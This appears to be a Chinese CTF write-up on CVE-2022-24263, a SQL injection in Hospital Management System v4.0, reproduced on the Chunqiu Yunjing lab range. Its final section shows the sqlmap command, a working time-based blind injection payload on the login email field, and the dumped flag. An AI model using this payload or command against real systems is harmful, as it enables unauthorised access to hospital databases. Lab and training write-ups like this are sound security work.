前言
CVE-2022-24263 是一个影响 Hospital Management System (HMS) v4.0 的 SQL 注入漏洞。这个漏洞允许攻击者通过注入恶意 SQL 代码来获取数据库的敏感信息,甚至可能控制整个数据库。以下是对这个漏洞的详细介绍:
漏洞描述
在 Hospital Management System v4.0 中,存在多个输入字段没有正确过滤用户输入,导致 SQL 注入漏洞。攻击者可以通过构造特定的 SQL 查询,将恶意代码注入到系统中,进而访问或修改数据库中的数据。
影响范围
任何运行 Hospital Management System v4.0 的系统都可能受到此漏洞的影响。如果系统没有应用适当的安全更新或修复,攻击者可以利用这个漏洞对数据库进行未授权的访问。
漏洞利用
利用这个漏洞的一个常见方法是通过登录表单或其他用户输入点注入恶意 SQL 代码。例如,攻击者可能会在用户名或密码字段中输入特殊构造的 SQL 语句,从而绕过身份验证或执行其他数据库操作。
修复措施
要修复此漏洞,开发者应确保所有用户输入都经过严格的验证和过滤,特别是在生成 SQL 查询时。此外,采用预编译语句(prepared statements)和参数化查询可以有效防止 SQL 注入攻击。
春秋云镜靶场是一个专注于网络安全培训和实战演练的平台,旨在通过模拟真实的网络环境和攻击场景,提升用户的网络安全防护能力和实战技能。这个平台主要提供以下功能和特点:
实战演练:
提供各种网络安全攻防演练场景,模拟真实的网络攻击事件,帮助用户在实际操作中掌握网络安全技术。
场景涵盖Web安全、系统安全、网络安全、社工攻击等多个领域。
漏洞复现:
用户可以通过平台对已知的安全漏洞进行复现,了解漏洞的产生原因、利用方法和修复措施。
通过实战操作,帮助用户掌握漏洞利用和防护的技能。
教学培训:
提供系统化的网络安全课程,从基础到高级,覆盖多个安全领域,适合不同水平的用户。
包含理论讲解和实战操作,帮助学员全面提升网络安全知识和实战能力。
竞赛与评测:
定期举办网络安全竞赛,如CTF(Capture The Flag)比赛,激发学员的学习兴趣和动力。
提供个人和团队的安全能力评测,帮助学员了解自己的安全技能水平。
资源共享:
平台提供丰富的学习资源,包括教程、工具、案例分析等,方便用户随时查阅和学习。
用户可以在社区中分享经验和资源,互相交流和学习。
春秋云镜靶场适合网络安全从业人员、学生以及对网络安全感兴趣的个人,通过在平台上进行不断的学习和实战演练,可以有效提升网络安全技能和防护能力。
介绍
Hospital Management System (HMS) v4.0 是一款综合性的医疗管理软件,专为医疗机构设计,以简化和优化医院的管理流程和操作。以下是 HMS v4.0 的主要特点和功能:
主要特点
-
患者管理
- 记录和管理患者的详细信息,包括基本信息、病历、就诊记录和治疗方案。
- 支持患者的入院、出院和转院管理。
-
预约管理
- 提供便捷的预约系统,患者可以在线预约医生,减少排队时间,提高就诊效率。
- 医生可以查看和管理预约记录,安排和调整日程。
-
医生管理
- 管理医生的详细信息和工作安排。
- 记录医生的就诊记录和手术记录,便于绩效考核和工作评估。
-
药品管理
- 记录和管理医院药品库存,包括药品的采购、库存、发放和使用情况。
- 提供药品使用报告和库存预警,确保药品供应的及时和安全。
-
财务管理
- 管理医院的财务收支,包括挂号费、诊疗费、药品费和其他费用。
- 提供详细的财务报表和统计分析,帮助医院进行财务管理和决策。
-
病房管理
- 管理病房和床位信息,包括病房的分配、使用和维护。
- 提供病房的实时状态,便于医院进行资源调配和管理。
-
实验室管理
- 管理实验室的检验项目和结果,记录患者的检验报告。
- 提供检验数据的统计分析,辅助医生进行诊断和治疗。
-
报告生成
- 生成各种管理报告和统计分析,包括患者报告、财务报告、药品使用报告等。
- 支持自定义报表,满足不同用户的需求。
应用场景
Hospital Management System v4.0 适用于各种类型和规模的医疗机构,包括:
- 综合医院:大中型综合医院,可以利用 HMS 的全面功能,提升医院的管理效率和服务质量。
- 专科医院:专注于某一专科的医院,可以根据需要定制 HMS 的模块,专注于特定领域的管理。
- 诊所和门诊部:小型医疗机构可以利用 HMS 的核心功能,提高日常运营的效率。
优势
- 提高管理效率:通过信息化管理,减少人工操作,提高工作效率和准确性。
- 优化患者体验:提供便捷的预约和就诊服务,缩短患者等待时间,提升患者满意度。
- 增强数据安全:通过权限控制和数据加密,保护患者隐私和医院数据的安全。
- 支持决策分析:通过全面的统计分析和报表生成,辅助医院管理层进行决策。
总结
Hospital Management System v4.0 是一款功能强大、操作简便的医疗管理软件,旨在通过信息化手段,优化医院的管理流程,提高工作效率和服务质量。它适用于各类医疗机构,是现代医院管理的理想选择。
漏洞复现
打开靶场
进入靶场是这个页面
网上查找漏洞相关信息
点击登录
可以看到有一个邮箱参数及密码,这里应该就是漏洞了
打开 BurpSuite 拦截抓包
复制值到 txt 文件中,使用 SQLMap 开跑
省略爆库爆表过程……(太慢了)
D:\CVE\sqlmap-master>python sqlmap.py -r sqlmap-post.txt -D "ctf" -T "flag" -C "flag" --dump
___
__H__
___ ___[)]_____ ___ ___ {1.8.6.17#dev}
|_ -| . [.] | .'| . |
|___|_ [(]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 22:17:15 /2024-07-03/
[22:17:15] [INFO] parsing HTTP request from 'sqlmap-post.txt'
[22:17:16] [INFO] resuming back-end DBMS 'mysql'
[22:17:16] [INFO] testing connection to the target URL
you have not declared cookie(s), while server wants to set its own ('PHPSESSID=a4p7mmiqgl2...ugmsr9eago'). Do you want to use those [Y/n] n
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: email (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: email=666@qq.com' AND (SELECT 1648 FROM (SELECT(SLEEP(5)))CpfC) AND 'ThOA'='ThOA&password2=123&patsub=Login
---
[22:17:17] [INFO] the back-end DBMS is MySQL
web application technology: PHP 7.3.20, PHP
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[22:17:17] [INFO] fetching entries of column(s) 'flag' for table 'flag' in database 'ctf'
[22:17:17] [INFO] fetching number of column(s) 'flag' entries for table 'flag' in database 'ctf'
[22:17:17] [WARNING] time-based comparison requires larger statistical model, please wait.............................. (done)
[22:17:20] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] n
1
[22:17:41] [WARNING] (case) time-based comparison requires reset of statistical model, please wait.............................. (done)
flag{d3ca3cd0-568f-48ff-bc52-421bffb4a
[22:29:51] [ERROR] invalid character detected. retrying..
ba6}
Database: ctf
Table: flag
[1 entry]
+--------------------------------------------+
| flag |
+--------------------------------------------+
| flag{d3ca3cd0-568f-48ff-bc52-421bffb4aba6} |
+--------------------------------------------+
[22:31:04] [INFO] table 'ctf.flag' dumped to CSV file 'C:\Users\ydd33\AppData\Local\sqlmap\output\eci-2zeculqw9h9wqm1tjdmm.cloudeci1.ichunqiu.com\dump\ctf\flag.csv'
[22:31:04] [INFO] fetched data logged to text files under 'C:\Users\ydd33\AppData\Local\sqlmap\output\eci-2zeculqw9h9wqm1tjdmm.cloudeci1.ichunqiu.com'
[*] ending @ 22:31:04 /2024-07-03/